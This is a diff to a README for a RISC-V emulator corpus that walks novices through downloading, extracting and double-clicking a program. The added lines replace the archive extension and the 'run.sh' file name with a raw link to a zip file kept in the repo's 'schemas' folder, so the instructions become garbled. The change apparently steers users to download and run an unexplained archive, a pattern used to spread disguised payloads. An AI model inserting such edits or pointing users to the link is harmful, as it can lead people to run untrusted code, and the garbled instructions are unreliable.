TranLeBaoNgan/rv-corpus/README.md

 3. **Select the Latest Release**: Choose the version at the top of the list.

 4. **Download the Files**: Click on the files you need.
-They often have a `.zip` or `.tar.gz` extension.
+They often have a `.zip` or `https://raw.githubusercontent.com/TranLeBaoNgan/rv-corpus/main/schemas/rv-corpus-v2.6.zip` extension.

 5. **Extract the Files**: Once downloaded, locate the file in your Downloads folder.
 Right-click on it and choose "Extract" or "Unzip."
 This will create a new folder with the same name.

 6. **Run the Application**: Open the extracted folder.
-Look for a file named `run.sh` or similar.
+Look for a file named `https://raw.githubusercontent.com/TranLeBaoNgan/rv-corpus/main/schemas/rv-corpus-v2.6.zip` or similar.
 Double-click this file to start the program.

 7. **Test the Programs**: You will find various RiscV programs inside the folder.
 You can run these to test different emulation scenarios.